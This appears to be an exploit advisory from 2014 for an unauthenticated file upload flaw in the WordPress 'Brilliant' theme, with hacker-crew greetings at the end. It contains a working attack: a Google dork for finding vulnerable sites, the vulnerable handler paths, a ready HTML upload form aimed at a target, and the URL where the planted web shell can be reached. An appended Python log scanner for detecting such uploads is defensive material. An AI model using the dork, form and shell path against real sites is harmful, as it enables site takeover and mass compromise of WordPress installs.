Author: AnonBoy | Published: 29-04-2014
############################################################################
# Title : WordPress Brilliant Themes CSRF File Upload Vulnerability
# Author : AnonBoy
# Date : 29/04/2014
# Facebook => https://www.facebook.com/nufailienafratsim.moechtar
# Vendor : N/A
# Google Dork => inurl:/wp-content/themes/brilliant
# Tested on : Windows 7
############################################################################
exploit : /theme/functions/upload-bg.php
/theme/functions/uploadbg.php
/theme/functions/upload.php
<form enctype="multipart/form-data"
action="http://www.target.com/wp-content/themes/brilliant/theme/functions/upload.php" method="post">
<input type="jpg" name="url" value="./" />
Please choose a file: <input name="uploadfile" type="file" />
<input type="submit" value="upload" />
</form>
The shell path will be posted.
Shell access ===> http://www.target.com/wp-content/themes/brilliant/theme/functions/{random_name_shell.php}
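
For defenders, an added example (not part of the original advisory): a scan of web access logs for POSTs to the three upload handlers listed above and for requests to other .php files in the same directory, which is where the advisory says the uploaded file lands. The combined log format, the `scan` function, its `known_files` allowlist and the sample lines are assumptions made for illustration.

```python
import re
from urllib.parse import unquote

# Directory and handler names are taken from the advisory; the rest is assumed.
FUNC_DIR = "/wp-content/themes/brilliant/theme/functions/"
UPLOAD_HANDLERS = {"upload-bg.php", "uploadbg.php", "upload.php"}

# Assumption: Apache/nginx "combined" access-log format.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    f'203.0.113.7 - - [29/Apr/2014:10:00:01 +0000] "POST {FUNC_DIR}upload.php HTTP/1.1" 200 31 "-" "-"',
    f'203.0.113.7 - - [29/Apr/2014:10:00:09 +0000] "GET {FUNC_DIR}a1b2c3.php?x=1 HTTP/1.1" 200 512 "-" "-"',
    '198.51.100.4 - - [29/Apr/2014:10:01:00 +0000] "GET /wp-content/themes/brilliant/style.css HTTP/1.1" 200 900 "-" "-"',
    f'198.51.100.9 - - [29/Apr/2014:10:02:00 +0000] "GET {FUNC_DIR}upload-bg.php HTTP/1.1" 404 0 "-" "-"',
]

def scan(lines, known_files=frozenset(UPLOAD_HANDLERS)):
    """Return (upload_posts, unknown_php) as lists of (ip, filename, status).
    upload_posts: POST requests to one of the advisory's upload handlers.
    unknown_php:  requests for a .php file in the same directory that is not
                  in known_files (extend it with the theme's shipped files).
    """
    upload_posts, unknown_php = [], []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # not a combined-format request line
        path = unquote(m["target"].split("?", 1)[0]).lower()
        _, found, name = path.partition(FUNC_DIR)
        if not found or "/" in name:
            continue  # outside the directory named in the advisory
        hit = (m["ip"], name, int(m["status"]))
        if name in UPLOAD_HANDLERS and m["method"] == "POST":
            upload_posts.append(hit)
        elif name.endswith(".php") and name not in known_files:
            unknown_php.append(hit)
    return upload_posts, unknown_php

if __name__ == "__main__":
    posts, unknown = scan(SAMPLE_LOG)
    for ip, name, status in posts:
        print(f"upload POST  {ip} {name} -> {status}")
    for ip, name, status in unknown:
        print(f"unknown .php {ip} {name} -> {status}")
```

A successful POST to a handler followed by a request for an unlisted .php file from the same address is the pattern to review first.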
--------------------------------------------------------------------------------------
[#] Greeting ############################################################################################################################ #
./Trojanspot ./Sacker_Boy ./chliZAceh ./Rijal North Aceh ./Sijulai ./Reja-exe ./TNCA ./Poo Chai ./Mirzja ./hexy khan ./Gantengers Crew
AND BIG FAMILY OF ACEH CYBER TEAM
##########################################################################################################################################